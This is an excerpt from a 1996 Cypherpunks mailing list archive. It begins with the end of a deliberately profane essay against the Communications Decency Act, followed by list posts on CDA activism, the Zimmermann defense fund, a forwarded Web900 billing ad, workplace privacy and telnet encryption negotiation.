 village green our Founders knew as the place to rouse the rabble who became
 Americans, but it is also different.  Your blind acceptance of the dubious -
 - make that dogass dumb --idea that children are harmed by hearing so-called
 dirty words has created some pretty stupid regulations without shutting down
 public debate, but those stupid regulations will not import to cyberspace
 without consequences that even the public relations whores in Congress
 should find unacceptable.
 
 In cyberspace, there is no time.  A posted message stays posted until it is
 wiped.  Therefore, there is no way to indulge the fiction that children do
 not stay up late or cannot program a VCR.  In cyberspace, there is no place.
 The "community standards" are those of the whole world.  An upload from
 Amsterdam can become a download in Idaho.  By trying to regulate obscenity
 and indecency on the Internet, you have reduced the level of expression
 allowed consenting adults to that of the most anal retentive blueballed
 fuckhead U.S. attorney in the country. The Internet is everywhere you can
 plug in a modem.  Call Senator Exon an "ignorant motherfucker" in Lincoln,
 Nebraska and find yourself prosecuted in Bibleburg, Mississippi.
 
 In cyberspace, you cannot require the convenience store to sell Hustler in
 a white sleeve.  The functional equivalent is gatekeeper software, to which
 no civil libertarian has voiced any objection. Gatekeeper software cannot be
 made foolproof, but can you pandering pissants not see that any kid smart
 enough to hack into a Website is also smart enough to get his hands on a
 hard copy of Hustler if he really wants one?
 
 In cyberspace, there is the illusion of anonymity but no real privacy.
 It is theoretically possible for any Internet server to seine through all
 messages for key words (although it seems likely the resulting slowdown
 would be noticeable).  Perhaps some of you read about America On Line's
 attempt to keep children from reading the word "breast?"  An apparently
 unforeseen consequence was the shutdown of a discussion group of breast
 cancer survivors.  Don't you think more kids are aware of "teat"
 (pronounced "tit") than of "breast?"  Can skirts on piano legs, er, limbs
 be far behind?
 
 But silly shit like this is just a pimple on the ass of the long-term
 consequences for politics, art and education.  You have passed a law that
 will get less respect than the 55 m.p.h. speed limit dead bang in the middle
 of the First Amendment.  Indecency is nothing but a matter of fashion;
 obscenity is the same but on a longer timeline.  This generation freely
 reads James Joyce and Henry Miller and the Republic still stands.
 The home of the late alleged pornographer D. H. Lawrence is now a beautiful
 writers' retreat in the mountains above Taos, managed by the University of
 New Mexico.
 
 Universities all have Internet servers, and every English Department has at
 least one scholar who can read Chaucer's English -- but not on the Internet
 anymore.  Comparative literature classes might read Boccaccio --but not on
 the Internet anymore.  What if some U. S. Attorney  hears about Othello and
 Desdemona "making the beast with two backs" -- is interracial sex no longer
 indecent anywhere in the country, or is Shakespeare off the Internet?
 
 Did you know you can download video and sound from the Internet?
 Yes, that means you can watch other people having sex if that is interesting
 to you, live or on tape.  Technology can make such things hard to retrieve,
 but probably not impossible.  And since you have swept right past obscenity
 and into indecency, the baby boomers had better keep their old rock 'n roll
 tapes off the Internet.
 
 When the Jefferson Airplane sang "her heels rise for me," they were not
 referring to a dance step.  And if some Brit explains the line about
 "finger pie" in Penny Lane, the Beatles will be gone.  All of those school
 boards that used to ban "The Catcher in the Rye" over cussing and spreading
 the foul lie that kids masturbate can now go to federal court and get that
 nasty book kept out of cyberspace.
 
 But enough about the past.  What about rap music?  No, I do not care much
 for it either -- any more than I care for the language you shitheads have
 forced me to use in this essay -- but can you not see the immediate
 differential impact of this law by class and race?  What is your defense -
 -that there are no African-Americans on the Internet, since they are too
 busy pimping and dealing crack?  If our educational establishment has any
 sense at all, they will be trying to see more teens of all colors on the
 Internet, because there is a lot to be learned in cyberspace that has
 nothing to do with sex.
 
 There are plenty of young people in this country who have legitimate
 political complaints.  When you dickheads get done with Social Security,
 they will be lucky if the retirement age is still in double digits.
 But thanks to the wonderful job the public schools have done keeping sex
 and violence out, we have a lot of intelligent kids who cannot express
 themselves without indecent language. I have watched lawyers in open court
 digging their young clients in the ribs every time the word "fuck" slipped
 out.
 
 Let's talk about this fucking indecent language bullshit.  Joe Shea, my
 editor, does not want it in his newspaper, and I respect that position.
 He might even be almost as upset about publishing this as I am about
 writing it. I do use salty language in my writing, but sparingly, only
 as a big hammer.  Use the fucking shit too fucking much and it loses its
 fucking impact --see what I mean?  Fiction follows different rules, and if
 you confine your fiction writing to how the swell people want to see
 themselves using language, you not only preclude literary depiction of
 most people but you are probably false to the people you purport to depict.
 
 Do you remember how real language used by real people got on the air and in
 the newspapers?  Richard Nixon, while he was president, speaking in the
 White House about official matters.  A law professor and a nominee for
 Supreme Court Justice arguing about pubic hairs and porno movies during
 Senate hearings. Are these matters now too indecent for the Internet?
 How much cleansing will be required of the online news services?
 Answer: Enough cleansing to meet the standard of what is appropriate
 for a child in the most restrictive federal judicial district.
 
 This is bullshit -- unconstitutional bullshit and also bad policy bullshit.
 To violate your ban on indecency, I have been forced to use and overuse
 so-called indecent language.  But if I called you a bunch of goddam
 motherfucking cocksucking cunt-eating blue-balled bastards with the morals
 of muggers and the intelligence of pond scum, that would be nothing compared
 to this indictment, to wit: you have sold the First Amendment,
 your birthright and that of your children.  The Founders turn in their
 graves.  You have spit on the grave of every warrior who fought under the
 Stars and Stripes.
 
 And what mess of pottage have you acquired in exchange for the rights of a
 free people?  Have you cleansed the Internet of even the rawest pornography?
 No, because it is a worldwide system.  You have, however, handed the
 government a powerful new tool to harass its critics: a prosecution for
 indecent commentary in any district in the country.
 
 Have you protected one child from reading dirty words?  Probably not, if you
 understand what the economists call "substitution" -- but you have leveled
 the standards of political debate to a point where a history buff would not
 dare to upload some of the Federalist v. Anti-Federalist election rhetoric
 to a Website.
 
 Since the lobby reporting requirements were not law when the censorship
 discussion was happening, I hope you got some substantial reward for what
 you gave up.  Thirty pieces of silver doesn't go far these days.
 
                                  # # #
 
  (Steve Russell, retired after 16 years as a trial judge in Texas, is
  Assistant Professor of Criminal Justice at the University of Texas at
  San Antonio.)
 
              This article may be reproduced free forever.
 
                                  * * *
 
                        * Chair * Online Activism *
       ********** Fifth Congressional District Democrats **********
       * Lincoln * Benton * Marion * Polk * Clackamas * Tillamook *
       ************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sun, 11 Feb 1996 00:26:59 +0800
To: cypherpunks@toad.com
Subject: Re: Need a "warning" graphic of some kind for CDA
Message-ID: <2.2.32.19960209112844.0068f1a8@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 08:27 AM 02/9/96 -0800, Simon Spero <ses@tipper.oit.unc.edu> wrote:
> The Administration has repeatedly stated its belief that those parts of 
>the bill are unconsitutional, and does not intend to enforce them. 

So why the fornicate did they include them? What's the point of passing laws that they say they're not going to enforce, unless it's either to enforce them later, or soften up the public for something _slightly_ more tolerable later.

feh.

Dave Merriman
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRsSBMVrTvyYOzAZAQHm0AQAtEjLduasFOvLKpFPXmkqLjQS+6pnj4Sp
NoLVGNUiV3xIGzMHSgCxYCYVQ8h5X7OreSxo6R4x4RGpgG6tadGkwvr6GUBbWg+W
j9+0/dsiIhlCfe2dv7pSGBjgLeXIp4jSb9BniMbiebdov/VLvEUs47fffzsui9vm
mBecJhZk0S4=
=HAa3
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"It is not the function of our Government to keep the citizen
from falling into error; it is the function of the citizen to
keep the Government from falling into error."
Robert H. Jackson (1892-1954), U.S. Judge
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geocities.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn (206) 860-9454 <allyn@allyn.com>
Date: Sun, 11 Feb 1996 12:44:01 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Tell me whats wrong with this
In-Reply-To: <ad40cb3f2f0210049e37@[205.199.118.202]>
Message-ID: <199602100136.RAA25981@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


This V Chip Stuff: 

How do you think this will be used in relation with just
plain wierd stuff. Not violent stuff, but just pleasently
weard.

By what I mean weard, check out http://clearplastic.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn (206) 860-9454 <allyn@allyn.com>
Date: Sat, 10 Feb 1996 16:55:10 +0800
To: Richard_J_Harris@msn.com (Richard Harris)
Subject: Re: Yeah, Yeah But what are we gonna do!
In-Reply-To: <UPMAIL07.199602091614520606@msn.com>
Message-ID: <199602100157.RAA26060@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


Allright. That does it.

I am going to volunteer to try to make a perl script that 
I will make available that will automatically email every
congressman that has an email address. I will include a pre
pared text of the email message. All you would have to do is
to sign it and it would send the same message to all of them
with email addresses automatically. I can even have it have
several prepaired texts so that they are all slightly different
so that any funky gatekeepers at the congress email sites that
attempt to keep out spams could be defeated.

What do you think? Is this worth it?

Mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Philip L. Dubois" <dubois@dubois.com>
Date: Sat, 10 Feb 1996 09:02:10 +0800
To: cypherpunks@toad.com
Subject: Zimermann Legal Defense Fund
Message-ID: <199602100013.RAA26234@teal.csn.net>
MIME-Version: 1.0
Content-Type: text/plain


I've received reports that the signature on my recent Cypherpunks post did
not check out.  I have no idea why it didn't check out, but I've re-signed
the message and now append it to this one.  

-----BEGIN PGP SIGNED MESSAGE-----


*

MESSAGE FROM ZIMMERMANN DEFENSE TEAM

FOR IMMEDIATE WIDE DISTRIBUTION WITHOUT MODIFICATION

I write on behalf of Philip Zimmermann and his legal defense team
for two reasons:  to offer thanks and to make an announcement.

First, we offer our thanks to all the generous souls who donated
money and services to the Zimmermann Legal Defense Fund.  Without
you, we could not have mounted the defense that we did, and we
would not have achieved the result that we did.  Your contributions
were made from a commitment to the causes of privacy and justice,
and we are grateful.

The announcement:  as you may know, I am the only lawyer who
was not working pro bono, i.e., without expectation of being
paid.  Three of our lawyers-- Ken Bass in D.C., Eben Moglen in New
York, and Curt Karnow in San Francisco-- devoted hundreds of
hours of time and substantial expenses for which they've not been
paid.  Tom Nolan in Palo Alto and Bob Corn-Revere in D.C. also
spent a great deal of time on this case for which they were not
paid.  And, of course, Joe Burton in San Francisco toiled in
obscurity on behalf of the other person who was also targeted by
the federal investigation.

I agreed up front not to bill for all my time, and judging from
the rate of current contributions, it now appears that the Defense
Fund will cover the fees and costs that I billed.  I would like to
see these other lawyers receive some compensation for their efforts.
Accordingly, all donations to the Zimmermann Legal Defense Fund
mailed, authorized, or generally "made" (as opposed to "received")
after midnight local time on 14 February 1996 will be distributed
among these other lawyers to defray their costs and, if possible,
to compensate them for a little of their time.

I make this announcement because people contributing to the Fund
have a right to know that Mr. Zimmermann's actual defense costs
are now covered and that additional donations will go to lawyers
who agreed to work for free and who were absolutely essential to
the defense.

Again, my thanks.


Philip L. Dubois
Counsel for Philip Zimmermann
Philip L. Dubois, P.C.
2305 Broadway
Boulder, CO  80304-4106
voice:  303-444-3885
fax:  303-444-1051
email:  dubois@dubois.com


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRvtf7Z7C+AHeDONAQHBDQQAmRtNlm3CyEi47PPJCwH6IFRprm9dJwgy
TqzEZj+WPCBDe599Dwx4x2MXx6OQRQ1QUwKDgafSs8BfDEHmxvXe8PMrdlQhIKCm
ztfATlqbY3vDOhxNf8qNCbFAARerDI3jgQ3n07GbgnCz7PmKRiNbsZv/ddNOV1RO
ygI4TODD5A8=
=rDv6
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 10 Feb 1996 11:16:34 +0800
To: "Philip L. Dubois" <cypherpunks@toad.com
Subject: Re: Zimermann Legal Defense Fund
Message-ID: <2.2.32.19960210021412.00915dcc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:07 PM 2/9/96 -0700, Philip L. Dubois wrote:

>I agreed up front not to bill for all my time, and judging from
>the rate of current contributions, it now appears that the Defense
>Fund will cover the fees and costs that I billed.  I would like to
>see these other lawyers receive some compensation for their efforts.
>Accordingly, all donations to the Zimmermann Legal Defense Fund
>mailed, authorized, or generally "made" (as opposed to "received")
>after midnight local time on 14 February 1996 will be distributed
>among these other lawyers to defray their costs and, if possible,
>to compensate them for a little of their time.
>
>I make this announcement because people contributing to the Fund
>have a right to know that Mr. Zimmermann's actual defense costs
>are now covered and that additional donations will go to lawyers
>who agreed to work for free and who were absolutely essential to
>the defense.

Remember that nothing says "Thanks" like Cash!  Don't forget the people who
donated their time and efforts in keeping Phil out of jail and cryptography
that much more free.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 10 Feb 1996 16:57:41 +0800
To: cypherpunks@toad.com
Subject: Re: What is really happening in Oregon
Message-ID: <2.2.32.19960210022427.00902720@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:29 PM 2/9/96 -0800, Joe Zychik wrote:
>Excerpted from today's Zychik Chronicle
>
>The Los Angeles Times writes: "rivers raged through Oregon" [should say
>"Oregon taxpayers sunk by Oregon government"]. "the regions worst flooding
>in three decades" [should say, "State of Oregon has been wasting tax payer
>money for 30 years"]. "At least 3 deaths were attributed to the flooding
>[should say, "State of Oregon kills 3 more innocent citizens"]. "13 counties
>were declared a disaster area [should say, "State of Oregon has been
>screwing these 13 counties especially"] "And the worst is yet to come" [the
>citizens will blame the weather]. "Rats by the hundreds started crawling out
>of Portland's sewers" [should say, "The parents of Oregon's politicians and
>bureaucrats came forward."]

You need to cut back on your medication (or increase it).  The water damage
in oregon has little to do with the action or inaction of government.  It
has much more to do with a strange set of weather patterns in Oregon.
(Mainly a whole lot of snow and ice followed by heavy rains.)

Right now the weather here is just creating lots of land slides and
flooding.  The worst seems over for now.  Time to wait for the water to
recede and then clean up the mess.  How this can be blamed on the Oregon
State government is beyond me...

What it has do do with Cypherpunks, I have no idea...  (Not even much of a
conspiracy there.)

Sounds like someone just wnats to rant.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@vishnu.alias.net>
Date: Sat, 10 Feb 1996 10:27:53 +0800
To: Mixmaster Mailing List <cypherpunks@toad.com
Subject: IRC chat
Message-ID: <Pine.BSD.3.91.960209183853.12483A-100000@vishnu.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've opened #remailop on EFnet if anyone would like to drop by and give 
their views on the telcom bill (or anything else for that matter). See 
you there!

 John Perry - KG5RG - perry@vishnu.alias.net -  PGP-encrypted e-mail welcome!
 WWW - http://www.alias.net
 PGP 2.62 key for perry@vishnu.alias.net is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp1.6.b2, a Pine/PGP interface.

iQEVAwUBMRvpqKghiWHnUu4JAQFGTwf+J7h60z0eZ9r7BprjzGASBGLRpPdQDpSg
tJ7kog5VWtToFEK4ljXa+eu9KerpkqdqqbG9G8RMIABapbn41091VfeuYeEpgAuc
nkUhF7rNYSbvuUlqLc/F/KhnUm6Ki0fsNnj+J6hyWCcwN3alhkWpSox5wJKo3fmc
xJemYufEUcby1MiAupKyHLDHk8+dT9OdrlitHzWBKIsfv/1eLj9u9CnJOJu+Ndq8
+SgqGxNt+z8EDduK2x4jfxxdSHtp8ApMw2WLZ9sctlzCX9iz48wnw3NZcT0pU3pD
OSyb9catClwzOEEyPlRBVVZClqbP3CSTQIbSbKOTAJfPPBenA6cXrQ==
=18tD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 10 Feb 1996 08:21:16 +0800
To: cypherpunks@toad.com
Subject: Fwd: Web900 -  The easiest way to charge users ...
Message-ID: <v02120d0dad418bdb909b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Fri, 09 Feb 1996 12:29:14 -0800
From: "J. Kent Hastings" <zeus@pinsight.com>
Organization: The Agorist Institute
MIME-Version: 1.0
To: ecash@digicash.com
CC: sek3@loop.com
Subject: Fwd: Web900 -  The easiest way to charge users ...
Sender: owner-ecash@digicash.com
Precedence: bulk

I just received this in email:

Web_Design_and_Promotion Mailing List wrote:
>
> to remove yourself from this list, please scroll to the bottom...
>
> ------------------------------------------------------------------
> Web900 -  The easiest way to charge users to access your web site!
> ------------------------------------------------------------------
>
> Dear WebMaster,
>
> We'd like to use this bandwidth to introduce you to a new service
> called Web900. Simply put, Web900 is the easiest way to charge your
> users for products, services, or accessing areas on your web site. The
> net is finally becoming a place where all of us can make money and
> Web900 is the easiest, most secure way that we've seen to collect that
> money from people surfing the net.
>
> We'd also like to take this opportunity to tell you a little bit about
> our company. Logicom has been in the online industry since 1987. We
> were one of the first developers for a BBS package called The Major BBS
> (now called Worldgroup) by Galacticomm, Inc. Since then, we've grown
> into a successful developer and Galacticomm's largest reseller.
>
> In 1994, we entered into the 900 access code business with a service
> called "Quick Credit 900." Quick Credit 900 works strictly with The
> Major BBS and Worldgroup systems by Galacticomm and it quickly grew
> into one of the largest 900 billing services available for the online
> industry. At the end of 1995, we bought out T.A.B.S. 900 in order to
> expand our market beyond just Galacticomm systems. T.A.B.S. covers
> other BBS packages such as Wildcat!, PCBoard, Searchlight, Mindwire and
> TBBS. This buyout made us the largest 900 billing service for the
> online industry.
>
> The next logical progression was to add Web900. Web900 enables Logicom
> to completely blanket the entire online industry with an easy to use
> 900 billing service. Our first few Web900 customers have been
> resoundingly successful. Contrary to popular belief, people really are
> spending money on the net! We have hundreds of clients using Quick
> Credit 900 and T.A.B.S. already and hopefully you'll be one of our new
> Web900 clients and help us grow Web900 into the success that our other
> 900 services are enjoying, while at the same time increasing real
> commerce on the web.
>
> Web900 is great for E-Zines, Adult Sites, Low cost product sales,
> Nonprofit organizations collecting donations, Member based information
> services, and virtually any web site that wants to charge for access.
> If you or any of your customers currently charge for access (or even if
> you're just thinking about it), we invite you to check out the
> information on Web900. Our URL is http://www.logicom.com - we do offer
> services other than Web900, so feel free to surf around while you're
> visiting. Once you're at our site, to get to the Web900 information,
> just click on the Web900 icon found on the clickable image map.
>
> Here's how it works: A web surfer gets to your site and wants to access
> a restricted area. You will have a form (see our web site for a sample
> form) that tells them to call a 900 number with their voice phone. They
> will call the 900 number, enter your Web Site's System ID (referenced
> on your form), and they will be given a redemption code. Then, they
> simply enter the redemption code into the form and they're all done -
> they have access. They will be billed on their phone bill and you (the
> webmaster) will receive a check from us (Logicom) 45 days after the end
> of the billing period for all codes obtained during that billing period.
>
> You'll find that Web900 is better than Cybercash, DigiCash, First
> Virtual or any other electronic cash method because it's so easy to
> use. Your customers don't have to fill out some sort of application ...
> they don't have to deal with "wallets", "VirtualPINs", or "ecash" ...
> they don't have to give ANYONE their credit card number or checking
> account number ... and they don't have to figure out what the heck
> "electronic cash" is. All this means that you don't have to sell them
> on any new payment concepts - everyone pays their phone bill with real
> money right now. They don't have to change their spending habits in any
> way.
>
> It's also important to mention that Web900 is totally secure. Web
> surfers don't have to give anyone their credit card number at any time.
> In fact, they don't even need to have a credit card number. The
> redemption code that they get from Web900 is only good on your system
> and it's only good for one use. You, the Webmaster, will be downloading
> a set of codes via a secure modem connection (not over the internet)
> for redemption purposes. There's no need for encryption to be used -
> everything can be done "in the clear" without any security concerns.
>
> Lastly, Web900 costs you absolutely nothing to setup, so you really
> have nothing to lose. (There is a 20% fee taken out of each call to pay
> the phone company and our administration fees.) In closing, we'd like
> to ask you to please look at the information on Web900 located at
> http://www.logicom.com and compare them to the other options (URLs are
> located at the bottom of this letter). If you have any questions,
> please feel free to e-mail us at web900@logicom.com or give us a call
> at (800) 764-4266 (international callers please use (954) 726-3868).
> Thank you for the time you've taken to read this letter, we hope you've
> find this knowledge useful.
>
> --------------------------------------------------------------
> Web900 is a trademark of Logicom, Inc. - http://www.logicom.com
> Worldgroup and The Major BBS are trademarks of Galacticomm, Inc. -
> http://www.gcomm.com
> Cybercash is a trademark of Cybercash, Inc. - http://www.cybercash.com
> Digicash and ecash are trademarks of Digicash bv -
> http://www.digicash.com
> First Virtual and VirtualPIN are trademarks of First Virtual Holdings
> Corproation - http://www.fv.com
>
> Note: Web900 is only available for *your* customers in the United
> States.
>
> ------------------------------------------------------------------
> Web900 -  The easiest way to charge users to access your web site!
> ------------------------------------------------------------------
>
> You are on the PostMaster Direct Mailing List.  You are on this list either
> by request or as a result of using the PostMaster system at
> http://www.netcreations.com/postmaster/
>
> If you wish to stop receiving mailings from us, please forward this message
> INTACT to deleteme@netcreations.com or for faster response, visit
> http://www.netcreations.com/postdirect/
>
> Thanks!
>
> ** Web_Design_and_Promotion zeus@pinsight.com    11076

--
J. Kent Hastings
Assistant Director of The Agorist Institute
zeus@pinsight.com, http://www.pinsight.com/~zeus/agorist/

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 10 Feb 1996 08:32:36 +0800
To: cypherpunks@toad.com
Subject: http://www.aqui.ibm.com -- a "links" search engine
Message-ID: <9602092352.AA08189@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I got email because I got linked to; this is the first I've heard of it.
AltaVista's upped the stakes on WWW data collection.  Apaprently aqui
(the spanish word for here) is a "link" database -- it lets you make
links and profile who would be interested in them.  You can register
(altho the intro page says "I wanna play anonymously" as a link) and
get links of interest to you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sat, 10 Feb 1996 10:45:41 +0800
To: cypherpunks@toad.com
Subject: Req. for soundbites
Message-ID: <2.2.32.19960209130800.00688be4@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

A local TV station has asked me for an interview, after I sent a graphic of a mono-digital hand gesture with the phrase "censor this!" to the Prez, Veep, and the area congresscritters (cc'd to 2 TV stations and a radio station), accompanied by a 'confession' and demand for swift prosecution.

Anyone got any nifty sound bites I can try to toss in?

Dave Merriman
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRsp68VrTvyYOzAZAQGAkAP/UeEHWF7vl1zYTiR0otsLoZ+jaa9BuSU6
JrGHtr+nKzN8eS2U+URK41B//n9+Ag9o7VlAF4+QPqNwgzugO5AWdbeOBQZ54V0H
HoM8uNSJoU1wJ4QHhtVYN0BDhrsvZ99dTxhGOmvHH3EUyxOFib6kDYxKNR4WgvWJ
1EGt3o8rb3Q=
=AFTX
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"It is not the function of our Government to keep the citizen
from falling into error; it is the function of the citizen to
keep the Government from falling into error."
Robert H. Jackson (1892-1954), U.S. Judge
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geocities.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: avatar@mindspring.com
Date: Sat, 10 Feb 1996 10:09:25 +0800
To: "Richard Harris" <Richard_J_Harris@msn.com>
Subject: Re: Yeah, Yeah But what are we gonna do!
Message-ID: <199602100027.TAA13064@borg.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:07 PM 2/9/96 UT, you wrote:
>It may just be me but ...
>
>i)	This in-fighting and bickering doesn't seem very productive
>
>ii)	What are we gonna do about the CDA?
>	The bikers fought the helmet law and won (in places)
>	We should do the same.
>
>	"It is better to have tried and failed than never have tried at all"
>
>	Our strength is in our numbers and our abilities we should use them
>	to ensure our freedom.  Science fiction has become our reality and 	their 
>paranoia.  
>
>	All we have to lose is our freedom.
>
Actually, I fought the Bill by writing and getting others to write to their
congressmen.
I also rebutted the passing of the Bill into law. Each time writing to 144
House members
and  64 Senate members.
Charles Donald Smith Jr.

||The government  is my shepherd I need not work. It alloweth me to lie
 down on a good job. It leadeth me beside stilled factories. It destroyeth
 my initiative. It leadeth me in the path of a parasite for politics sake. YEA,
 though I walk through the valley of laziness and deficet spending I shall
 fear no evil, for the government is with me. It prepareth an economic utopia
 for me by appropriating the earnings of my grandchildren. It filleth my head
 with false security. My inefficiency runeth over. Surely, the government 
should care for me all the days of my life, and I will dwell in a fools paradise
forever.................AMEN!   || nuke'm if ya got'em||





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leslie Todd Masco <cactus@hks.net>
Date: Sun, 11 Feb 1996 12:44:09 +0800
To: cypherpunks@toad.com
Subject: Re: Regarding employee rights on company equipment
Message-ID: <199602100034.TAA06923@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> From Edupage Feb 8, 1996,
> 
> INTERNET USAGE POLICIES
> Neal J. Friedman, a specialist in online computer law, says that "employees
> are under the misapprehension that the First Amendment applies in the
> workplace --  it doesn't. 

Friedman is only pseudo-right: IE, his arguement makes sense but courts have not
always followed this reasoning, though: if you're really interested in this topic,
investigate rulings where an employer has read an employee's voicemail.

The key concept is "reasonable expectation of privacy."
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMRvoHSoZzwIn1bdtAQGA5AF+NLNypUxQ1E5/X6smpiY215d2R1O0A/Y0
n0hlXF9lpZNg6y+qlLWR5qZc00PZ5HpX
=NI4R
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 10 Feb 1996 10:32:50 +0800
To: cypherpunks@toad.com
Subject: DUR_fum
Message-ID: <199602100036.TAA26122@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   2-10-96. EcoMist:

   "We know you're reading this." A survey of US privacy
   issues, with GAK, crypto and anonymity options. 

      Americans think they have a right to privacy but they 
      have lost control over who knows what about them. The 
      chief culprits are lots of little brothers, all 
      gossiping with each other over computer networks. But 
      Big Brother is doing his bit: in the struggle against 
      crime, terrorism, deadbeat parents, illegal immigrants 
      and even traffic jams, the government keeps an 
      ever-closer eye on its citizens. Technology itself 
      may provide a partial answer. All-but-foolproof 
      encryption technology is freely available over the 
      Internet and will not go away no matter how much 
      Uncle Sam wishes it would. 

   "Virtual privacy." A related editorial which examines
   privacy protection regulation.

   "Magic armour."

      The Shortstop system deploys coherent jamming to fool
      a proximity fuse into thinking that its shell has
      arrived at detonation height when it is actually at an 
      altitude of 100 metres or so. To do this, Shortstop 
      uses a special "durfum" chip.

   DUR_fum  (For the 3)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 10 Feb 1996 16:56:55 +0800
To: Joe Zychik <jzychik@via.net>
Subject: Re: What is really happening in Oregon
In-Reply-To: <2.2.32.19960210002941.00f1c3e0@via.net>
Message-ID: <199602100102.UAA12734@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Can you explain what the hell you sent this to Cypherpunks for? It has
nothing to do with cryptography, privacy, or anything else discussed
on the list.

Joe Zychik writes:
> Excerpted from today's Zychik Chronicle
> 
> The Los Angeles Times writes: "rivers raged through Oregon" [should say
> "Oregon taxpayers sunk by Oregon government"]. "the regions worst flooding
> in three decades" [should say, "State of Oregon has been wasting tax payer
> money for 30 years"]. "At least 3 deaths were attributed to the flooding
> [should say, "State of Oregon kills 3 more innocent citizens"]. "13 counties
> were declared a disaster area [should say, "State of Oregon has been
> screwing these 13 counties especially"] "And the worst is yet to come" [the
> citizens will blame the weather]. "Rats by the hundreds started crawling out
> of Portland's sewers" [should say, "The parents of Oregon's politicians and
> bureaucrats came forward."]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Name Withheld by Request)
Date: Sat, 10 Feb 1996 03:39:09 +0800
To: cypherpunks@toad.com
Subject: Telnet-ietf: AUTH, ENCRYPT
Message-ID: <199602091910.UAA20013@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Heads up:
	A discussion is starting up on the telnet-ietf list re: adding
message integrity checking to option negotiation, so it can't be hacked
with an active attack to defeat, for example, the AUTH and ENCRYPT options.
Highlights:
	- Authentication and encryption are (should be) orthogonal.
	- The "default" encryption should be something stronger than DES
	  OFB, which supposedly was chosen to accomodate dog-slow PCs.
	- Negotiation for non-authenticated, non-encrypted connections has to
	  be protected, too, to prevent attacks.

'telnet berserkly.cray.com 23000' gets you to an interactive browser of the
list archives.  Subscriptions to telnet-ietf-request@cray.com.

a





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 11 Feb 1996 12:16:59 +0800
To: Cypherpunks@toad.com
Subject: A Rant about Senator James Exon
Message-ID: <ad4147eb37021004e8ee@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


